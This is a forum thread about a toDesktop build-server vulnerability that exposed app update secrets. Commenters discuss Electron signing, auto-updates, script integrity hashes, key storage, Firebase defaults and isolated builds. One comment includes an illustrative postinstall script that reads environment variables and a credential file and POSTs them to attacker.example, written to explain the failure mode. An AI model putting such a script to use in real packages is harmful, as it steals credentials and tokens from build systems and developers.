Dave and toDesktop have built a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often argue against too much abstraction and long dependency chains in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic. (See the config sketch after this list.)
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
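For what it's worth, here is a minimal sketch of what that setup can look like in a Forge config. This is illustrative only: the option names follow recent @electron/packager releases (which pass osxSign/windowsSign through to @electron/osx-sign and @electron/windows-sign), and the identity string and makers are placeholders, not a working configuration.

    // forge.config.js -- illustrative sketch, adjust to your certificates and makers
    module.exports = {
      packagerConfig: {
        // passed through to @electron/osx-sign
        osxSign: {
          identity: 'Developer ID Application: Example Corp (TEAMID1234)', // placeholder
        },
        // passed through to @electron/windows-sign; with Azure Trusted Signing you would
        // point this at your signtool/metadata configuration rather than a local .pfx
        windowsSign: {},
      },
      makers: [
        { name: '@electron-forge/maker-squirrel', config: {} },
        { name: '@electron-forge/maker-zip', platforms: ['darwin'] },
      ],
    };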
It is your duty to make sure _all_ of your users are able to continue using the same software they installed, in exactly the same way, for the reasonable lifetime of their contract, the package, or the underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible, not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
And anyone who does will find a percentage of users figure it out and then just get back to work.
The answer is a support window. If they are in bounds and have active maintenance contracts, support them.
If not, give them an option to get on support, or wish them luck.
Then the other answer is to really think releases through.
None of it is cheap. But it can be managed.
For the vast realm of sub-$300/year products, the ones that actually use updaters, all your suggestions are completely unviable.
In practice, auto-updates mostly happen for software used at home or in SMBs that might not have functioning IT. If security is the concern, why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones that were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why, and it involves an MBA-type person thinking anyone using sub-$300 software just can't think for themselves, and if this line of thought cuts some costs or generates some revenue, all the better.
Sure, viruses have been with us since the early 80s, but they mostly targeted the OS, and there were no rapid security patch release cycles back then. You just had 'prevention' and mostly cleanup.
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last time I tried to support old systems in my app, the vendor (Apple) had stopped supporting them and didn’t even provide free VMs. Windows 10 is scheduled to lose support this year (afaik). On Linux, glibc or GTK will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about; they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
Which leaves you with self-updaters. I definitely agree that ideally it shouldn’t be the application's job to update itself. But we don’t live in that world atm. At the very least you need update checks and EOL circuit breakers for apps that aren’t forever local-only apps. Which is not a niche use case, even if local-first infra were mature and widely adopted, which it very much isn’t.
Anyway, my app works without internet, pulls no business logic at runtime (live updates), and it uses e2ee for privacy. That’s way more than the average ad-funded bait-and-switch ware that plagues the majority of commercial software today. I wish I didn’t have to worry about updates, but the path to fewer worries and a healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
they avoid mentioning it, but the Microsoft managed package format (MSIX) works just fine without the Microsoft Store. create an App Installer manifest, stick it on a website, and get semver-d differential updates across multiple architectures for free: https://learn.microsoft.com/en-us/windows/msix/app-installer...
msft have woefully underinvested in the ecosystem and docs though. I wish they'd fund me or others to contribute on the OSS side - electron could be far simpler and more secure with batteries-included MSIX
EDIT: I think your link answered some of these questions. I’m on .msi myself so can’t benefit from it yet anyway.. basically these things need to be managed by the app bundlers like electron & tauri otherwise we’re asking for trouble. I think..
Why do you need "free VMs" as a professional software company? A couple of legacy machines is pocket change compared to the salary of even a single developer.
> Windows 10 is scheduled for non-support this year (afaik).
So? People are still releasing new software for XP. It's not that hard.
> On Linux glibc or gtk will mess with any GUI app after a few years.
glibc provides extreme long-term backwards compatibility so isn't a problem as long as you build against the oldest version you want to support.
gtk is a problem but also doesn't change as often as you are implying - we are only at version 4 now. And depending on what software you are building you can also avoid it.
> If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
So that your users have a reason to choose you over Microsoft, Google and Apple.
Linux, I got burned again yesterday. The Proxmox distribution doesn't have a package I need in its repository.
I try to use the Ubuntu package - it does not work.
I try to use the Debian one - the version is too old.
How do I solve this? By learning some details of how Linux distributions and repositories work, struggling some more, and finding a custom-built version of the .deb. Okay, I can do it, kinda, but what about a non-IT person?
Software without dependencies is awesome. So, docker is something I respect a lot, because it allows the same model (kinda).
Auto-updaters are the most practical and efficient way of pushing updates in today's world. As pointed out by others, the alternative would be to go through the app store's update mechanism, if the app is distributed via an app store in the first place, and many people avoid the Microsoft Store/macOS App Store whenever possible. And no developer likes that process.
Apart from, maybe, Linux distros, neither Apple nor Microsoft provides anything to handle updates that isn’t a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs, but in the meantime you still have to distribute and update your software. Should the update be automatic? No. Should you provide an easy way to update? I’d say that in the end it depends on whether you think it’s important to provide updates to your users. But should you expect your users or their OSs to somehow update your app by themselves? Nope.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
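To make the idea concrete, here is a toy sketch of that chain of trust using Node's crypto module. It is a simplification, not a real PKI: a production setup would issue proper certificates with expiry and revocation metadata, and the keys would live in an HSM or offline medium rather than in a script.

    const { generateKeyPairSync, sign, verify } = require('node:crypto');

    // 1. Root ("shoe-box") key pair: generated once on an offline machine,
    //    archived on paper/tape/optical, never stored anywhere networked.
    const root = generateKeyPairSync('ed25519');

    // 2. Hot intermediate key: the one that actually signs releases day to day.
    const intermediate = generateKeyPairSync('ed25519');

    // 3. The root endorses the intermediate's public key.
    const intermediatePub = Buffer.from(
      intermediate.publicKey.export({ type: 'spki', format: 'pem' })
    );
    const endorsement = sign(null, intermediatePub, root.privateKey);

    // Clients ship with only the root *public* key and verify the chain. If the hot
    // key is compromised, you endorse a replacement (and sign a revocation) with the
    // shoe-box key, then put it back in the box.
    console.log('intermediate endorsed by root:',
      verify(null, intermediatePub, root.publicKey, endorsement));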
You can pick up a hardware security module for a few thousand bucks. No excuse not to.
I'd rather use one of the most reliable and cheap hardware security modules we know of: paper.
Print a bunch of QR/datamatrix codes with your key. Keep one in a fireproof safe in your house, and another one elsewhere.
Total cost: ~$0.1 (+ the multipurpose safe, if needed)
It is a bit expensive when it gets to 5-10 printers but still cheaper than the thousands.
I've noticed a lot of websites import from other sites, instead of local.
<script src="scriptscdn.com/libv1.3">
I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML from in the first place?), but they aren't incentivized to have other sites use a hash.
And once you vendor your dependencies you can calculate the hash yourself
[0]: there are caveats to this
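For reference, a minimal Node sketch of computing a Subresource Integrity value for a vendored file ('vendor/lib.js' is a hypothetical path; SRI is a base64-encoded SHA-256/384/512 digest of the exact bytes you serve):

    const { createHash } = require('node:crypto');
    const { readFileSync } = require('node:fs');

    // Any change to the served file invalidates this value, which is the point.
    const digest = createHash('sha384').update(readFileSync('vendor/lib.js')).digest('base64');
    console.log(`<script src="/vendor/lib.js" integrity="sha384-${digest}" crossorigin="anonymous"></script>`);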
I think https and integrity hashes address two very orthogonal attack vectors.
Do you mean that hashing the file takes time? I guess that can be significant, but it's probably 2 or 3 cycles per byte, and average js size is like 10kb tops? 30k cycles doesn't look like much; at a few GHz that's on the order of ten millionths of a second.
Originally the point of using a shared CDN like this was that if others used it too the file would already be cached on the user's computer and make it even faster. But, this feature was used for fingerprinting users by checking which files from other websites were cached and browsers have isolated the caches in response which makes it impossible to get the speed benefits from before.
So if you're not getting that speed benefit, and only really getting a tiny bandwidth reduction, the risks of serving the file from a 3rd party (which could be mitigated by the hashes) aren't worth it compared to simply vendoring the file and serving it yourself.
So it's not that hashing prevents caching or lowers response times, but that the risk it mitigates isn't worth the effort. Just err on the side of serving the file yourself.
Plus, as mentioned, only 1st party origins enjoy any benefits of caching content for faster load times so you get an additional benefit
wget url; sha256 file
So, why did you not actually post the correct shell script? Apparently that would have been more effort to get right and ensure is correct, right? And it would also have to work on every OS. And there you have it: if someone first has to figure out which script to run, some percentage will give up there. And that's my point: the browser should make it as easy as possible to avoid that from happening.
How does the browser know which files to warn you about? What about scripts that are generated dynamically and have no static hash? There's plenty of reasons why you wouldn't want this.
> What about scripts that are generated dynamically and have no static hash?
Well, then the warning is still valid because this is a security risk. I guess it'd be fine to be able to suppress the warning explicitly in those cases.
> There's plenty of reasons why you wouldn't want this.
For example? Honestly curious where you would not want a warning by default.
- After version X we are displaying a prominent popup if a script isn't loaded with a hash
- After version Y we start blocking scripts loaded without hashes
They could solve this problem in a year or so, and if devs are too lazy to specify a hash when loading scripts then their site will break.
There are security risks with JSONP (a hack to bypass same-origin policy), and the successor (CORS) has been around since 2009, so phasing it out may be a good thing.
https://dev.to/benregenspan/the-state-of-jsonp-and-jsonp-vul...
Also, I don't think some of those tracking scripts are strictly static content; maybe their strategy to fingerprint browsers involves sending different shit to different users.
Specifying a script hash says that you as the owner of that site agree to load the content only if it matches the hash. Presumably you trust the content enough to serve it to your users.
Disclosure: I work at Google, but not on Chrome.
[1] https://flbrack.com/posts/2023-02-15-dont-break-the-web/
I have always put Windows signing on hold due to the cost of commercial certificate.
Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?
I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign
Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundler with it, or are you forced to use Vite? I guess that even if you can, you still pull in all those dependencies when you install it, and naturally you can't opt out of that. The dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dev dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on esbuild (because it's just one Go binary) and Electron Builder (electron.build).
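As an aside, here's a rough sketch of what that kind of esbuild-driven main-process build looks like (assuming an entry at src/main.ts; 'electron' has to stay external because it is provided at runtime):

    // build.js -- illustrative only
    const { buildSync } = require('esbuild');

    buildSync({
      entryPoints: ['src/main.ts'],
      bundle: true,
      platform: 'node',       // Electron's main process is a Node environment
      external: ['electron'], // never bundle the electron module itself
      outfile: 'dist/main.js',
    });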
I built one code signing system after being the “rubber duck” for a gentleman who built another, and both used HSM cards and not cheap ones. Not those shitty little USB ones. One protected cellphones, the other protected commercial aviation.
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CAs or not, though?
github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want a github integration to have permissions for, and then, for each repo, the specific permissions needed. The flow should be designed so that minimal permissions are encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
By design, the gh cli wants write access to everything on github you can access.
I’m not sure how much of this is “standard” for an org though.
It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.
If I just want to point to an exe file link in S3 without auto updates, should just compiling and uploading be enough?
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
Hubris. Does not inspire confidence.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
Yes, we re-architected our build container as part of remediation efforts, it was quite significant.
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again."
Fact is, it could still happen! Nobody likes that reality, and overall, when we think about all this stuff, networked computing is in a sad state of affairs.
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
I'm not sure I read anything that makes me confident this class of bugs could never recur. I could be reasonably confident this _exact_ bug in this _exact_ scenario may not happen again, but that only makes me more concerned about variants that may have equal or more serious implications.
So I'm wondering which claim did it for you? I only really saw pen test as a concrete action.
If you get a slap on the wrist, do you learn? No, you play it down.
However, if a dev who gets caught doing a bad is forced to resign, then all the rest of the devs doing the same thing will shape up.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, do a write-up on it, disclose the issue and its impact to users, and publicly apologize and hold themselves accountable. That right there is textbook engineering ethics 101 being followed.
"Yeah it was a problem but it's fixed now, won't happen again"
Sure buddy.
It's not something you fix. When stuff like this happens, it's foundational; you can't fix it, it's a house of cards, you gotta bring it down and build it again with lessons learned.
It's like a skyscraper built with hay that had a close call with some strong northern winds, and they come out and say, we have fortified the northern wall, all is good now. You gotta take it down and build it with brick my man.
I'm done warning people about security, we'll fight it out in the industry, I hope we bankrupt you.
That's the last thing you should ever do within a large scale software system. The idea that restarting from scratch because "oh we'll do it better again" is the kind of thing that bankrupts companies. Plenty of seasoned engineers will tell you this.
https://www.joelonsoftware.com/2000/04/06/things-you-should-...
then nearly everyone involved has an incentive to cover up the problem or to shift blame
Got it
There are some people who will be discouraged from committing a crime by the threat of punishment. But many will not. Many people behave well because they’re just moral people, and others won’t because they’re just selfish and antisocial. Still others commit crimes out of desperation despite the risks. If the threat of imprisonment were fully effective, there would be no crime, because we already have prisons and punishments. But since we do have crime, it logically follows that the threat alone isn’t enough.
The other point here is that threat of punishment is not particularly effective as a management strategy in the private sector. It doesn’t incentivize behavior in the manner you might believe. Mostly it makes your reports dislike you and it makes them less productive. It’s a thing you learn pretty quickly as a manager.
There’s a model of a person being a rational thinker, but in reality, people aren’t always rational. (Hell, adolescents are biologically programmed not to be rational and to stress test the limits of nature and society.) You find success in making less-than-rational people work together in harmony and achieve positive outcomes.
https://www.psychologytoday.com/us/blog/crime-and-punishment...
https://www.unsw.edu.au/newsroom/news/2020/07/do-harsher-pun...
https://www.ojp.gov/pdffiles1/nij/247350.pdf
https://www.helsinki.fi/en/news/economics/do-harsh-punishmen...
And it pays off in cases like this, I'll be talking with someone about a topic like the seriousness of a vulnerability, they disagree, that's fine no need to convince me, you won't. And then it turns out they're left-leaning abolitionists who are against the idea of jails.
Many such cases, on the other hand I'll be disagreeing with someone on business strategy, and two lines later they reveal that they think taxation is theft. I can rest easy and ignore them.
Respectfully, that’s not a very “hacker” way of seeing the world. Hackers learn from their mistakes and adapt. (Just like this software company is doing.)
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
If the topic becomes questioning century-old traditions like jails, taxes, or war, like we're about to revolutionize humankind, I'm out.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...
Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)
> No malicious usage was detected
Curious to hear about methods used if OK to share, something like STRIDE maybe?
> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.
It should have been on your customers to decide if they still wanted to use your services.
They were compensated, but they don't elaborate.
> for those wondering, in total i got 5k for this vuln, which i dont blame todesktop for because theyre a really small company
Woooowwww!
See latest line: "update: cursor (one of the affected customers) is giving me 50k USD for my efforts."
The employee made a mistake and you just paid for them to learn about it. Why would you fire someone you just educated?
Nobody gets fired: learning opportunity for next time, but little direct incentive to improve.
Fire someone: accountability theater (who is really responsible), loss of knowledge.
AFAIK, blameless postmortems and a focus on mechanisms to prevent repeats seems like the best we’ve come up with?
If they didn't pay you a cent, you have no liability here.
IANAL, not legal advice
The lesson: don't use USB sticks people give you, unless you have your own way of verifying that they're virus-free.
Also, don't give people bombs. That's usually illegal, unlike giving someone software with unknown bugs in it.
So this is to say: at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with Firebase, but to me this just screams that something about the configuration process is being improperly communicated, or is just too convoluted as a whole.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I have a similar qualm with GraphQL.
In addition to that, it'd be cool if the blameless postmortems were made public, so everyone could learn from them.
As for the other 2 options of restricting freedom, and extremely blameful postmortems, I reject both.
You seem really stuck on the first two options. Why does it matter, given that the third is the best? Do you still insist upon a false dichotomy?
Usually when you don't know something, you ask someone who knows. Since you sort-of asked here, I'll give you the answer:
Blameless postmortems lead to fewer failures, which is ostensibly the goal here. So what do you get from your idea of blameful ones? Feeling good about punishing someone, even though you're increasing failures by doing so?
Either rhetoric and discourse are unfamiliar to you (for instance, a basic tenet is that one does not make a strong claim which acts as foundational evidence for their entire premise and then assume it to be taken as fact based on statement alone -- if that were true then 3rd graders would win all arguments by saying 'nuh-uh'), or you don't understand that responsibility can also apply to you in many cases.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
In no other industry do workers blame their tools.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
This means someone set up these rules improperly. Even then, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and, at a minimum, understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
https://sf-fire.org/employment-opportunities/h2-firefighter
I don't think it's out of the question to expect professionalism at 150k. These are VC funded companies, not a couple of college kids scraping together a prototype.
Then again, if I was a CTO seeing stories like this I'd be inclined to NOT use Firebase. I'm actually using Supabase right now since I don't like vendor lock in. Deploying Supabase manually is really difficult, but it is an option.
I imagine if I ever run a serious company, which I don't think will ever happen, I would take something like Supabase and run it on prem with some manner of enhanced security.
It's interesting though... For decades the industry has been trying to push this narrative that you don't need servers. You can handle everything using some magic platform, and throw in a couple of custom lambda functions when you need to execute logic.
Parse, Firebase, Appwrite and dozens of others emerged to fill this niche.
ToDesktop provides yet another layer of abstraction. We don't want to handle our own app updates? Cool, let someone else do it. That someone else doesn't want to manage their own backend? Cool, let someone else do it.
You end up with multiple layers of potential vulnerabilities which shouldn't exist... Cursor, Arc, etc could run their own update servers.
Maybe the solution is a Steam like distribution platform. Or just using Steam itself. That's a 30% cut to let someone else figure out your app distribution...
You can expect whatever you want, just prepare to be disappointed. We have absolutely learned by now that unless there are very real consequences for doing or not doing something, you will regularly see the worst possible thing happen. This is why licenses and legal 'sign-offs' exist. There needs to be a licensing organization that can revoke people's ability to get certificates, or even to be employed working on certain aspects of software, if we ever want to solve this problem. I mean, you even need a license to cut hair in many states.
What a dystopian future, curl without a permit?
Why are you blaming the rank-and-file employees? The buck stops with the employer. If anything, fine the companies.
Software is not just something someone uses for hobbies or for word processing or whatever. A bad design decision in some critical software can have just as much of an impact as a bad design decision in a bridge or an airplane. If we want to be called 'engineers' then we need to put more on the line than just a public apology when something goes wrong due to a decision someone actively made to save money or reduce the work involved. And of course it should involve the people who make those decisions and not just the grunt who implemented them.
But if the 'grunts' had the power to say 'no, I will not do this because it is insecure and my license is on the line' then that's a good thing. No?
This will never work in a global economy. If you outsource the software, you're just begging companies to find someone making $15 to be the fall guy.
Sounds pretty bad. Your manager tells you to do something stupid or you're fired. You do so, and when it fails they blame you and your software engineering license is revoked. You can't find a job, and now you get to live in a homeless shelter.
Meaningful fines for companies is the only way to fix this.
Maybe... For some sensitive things like location data an expensive permit should be required. But this needs to be a corporate responsibility, not an individual one.
In your scenario bad companies are going to ruin the lives of their employees by making them risk their licenses.
Arguably this whole thing wouldn't happen if these apps were distributed and updated via the OSX app store. If that's the future you want, it's largely already here.
You can check a setting in OSX to make it so.
Who decides what software to regulate. Do I need a permit to install Python?
I don't want to regulate software. I want people to have something to lose if they make a decision that has a large impact.
> Arguably this whole thing wouldn't happen if these apps were distributed and updated via the OSX app store. If that's the future you want, it's largely already here.
I don't understand this point.
> Who decides what software to regulate.
Who decides any laws or regulations?
> Do I need a permit to install Python?
Does you installing Python have potential consequences for large numbers of people or could it cause a significant amount of harm?
Why do you take the most extreme possible position and apply it to me? Is it that difficult to argue against a sensible one?
I don't understand this point.
The core of this issue is an insecure updating mechanism for desktop apps. You can argue that, for security's sake, users may opt to only use the official Apple App Store or the official Microsoft Store. In this case, instead of having a random startup manage the update process, you have a couple of multibillion-dollar companies.
I'm trying to figure out what exactly you want to happen here. Would you essentially make it illegal to distribute software without a permit? Would distributing certain software require a permit?
If you want to run your company using vetted software and limit your developers to only use a small list of approved software. You can do that. I've worked in such environments. You can lock down the corporate firewall. The point is choice.
It's completely different if you basically want a regulatory agency which will decide what software people are allowed to build.
Outside of work I like to use niche Linux distros. If I accidentally wipe my vacation photos during the install process, that's a risk I took. I don't have a right to complain that I destroyed my own data and blame it on software largely built by volunteers.
However I don't disagree completely. If you want to build a hardened fork of Linux with software vetted by your private certifying authority, that could be a good market. If all engineers working on your custom fork need to be "licensed" by a privately run organization, that is also fine.
I just wouldn't want the State to do this.
I’d argue no.
Let the private sector regulate this. If you want to use an extremely locked down OS with a small handful of apps, go right ahead.
The State has no role in this.
I guess if you can prove negligence you can sue.
This is a better point than you realize. Blameless postmortems in IT are largely inspired by blameless postmortems from aerospace failures.
Defaults should be secure. Kind of blows my mind people still don't get this.
That's why we don't have seatbelts or safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt, so why bother at all, right?
If you drive in a way that affects the safety of others, there are generally consequences.
Remove as many hurdles as possible to increase adoption.
The only reason we didn't for so long was that we didn't have a viable alternative. Now that we do, we should absolutely stop writing C.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
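To make that failure mode concrete, here is a rough sketch of what any package.json lifecycle script can do once it runs in a container that also holds secrets. Paths and the collection endpoint are hypothetical; Node 18+ is assumed for the global fetch.

    // package.json: { "scripts": { "postinstall": "node collect.js" } }
    const { readFileSync } = require('node:fs');

    const read = (p) => { try { return readFileSync(p, 'utf8'); } catch { return null; } };

    // Anything the build user can see, the "build" can see too.
    const loot = {
      env: process.env,                                   // CI-injected tokens, API keys
      creds: read('/home/builder/.config/firebase.json'), // hypothetical credential path
    };

    // The same outbound access needed for `npm install` is enough to send it out.
    fetch('https://attacker.example/collect', {
      method: 'POST',
      body: JSON.stringify(loot),
    }).catch(() => {});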
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
Funny you should mention this because I was just psyching myself up to submit my blog piece from last night on the topic.
In Python, downloading packages using the native package installer (Pip, which really doesn't itself do anything that could be called package management) is unsafe because of build scripts - unless you tell it to only accept pre-built packages, defeating the point of the systems these Linux distros are using. (I assume/hope people in this position are aware of the problem and have rigged up another solution with the API. In the post I commented that I don't know of such solutions being publicly available, but surely they exist somewhere.)
You'd be justified in wondering why the build script runs when you only ask to download the package. It's mainly because of the historically atrocious approach to metadata (and all the legacy packages for which installation is still supported). But from reading the issue trackers, it seems like the code paths aren't especially easy to disentangle, either - since they've gone so long with the assumption baked in that the problem isn't really solvable.
In other HN posts I've complained about people pointing out things in the Python packaging ecosystem that aren't really problems. But this really is one.
https://zahlman.github.io/posts/2025/02/28/python-packaging-...
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
There is just far too much insecure and typo-squatted malware out there to pull dependencies off the internet raw.
If you're providing a build container service then you pretty much have to run untrusted code (the customer's) in the container, yes? So then the problem is really just the bad Firebase config... ?
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
Security doesn't help if all your users leave.
Why would running code on a github action runner that's built to run code be against ToS?
If it was, I'm sure they'd ban the marketplace extensions that make it absolutely trivial to do this: https://github.com/marketplace/actions/debugging-with-ssh
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
The number of malicious packages is high enough, then you have typo-squatted packages, and packages that get compromised at a later date. Being isolated from the net with proper monitoring gives you a huge heads-up when your build system suddenly tries to contact some random site/IP.
You're far more likely to encounter a security issue from adding/upgrading a dependency than your build process requiring internet access.
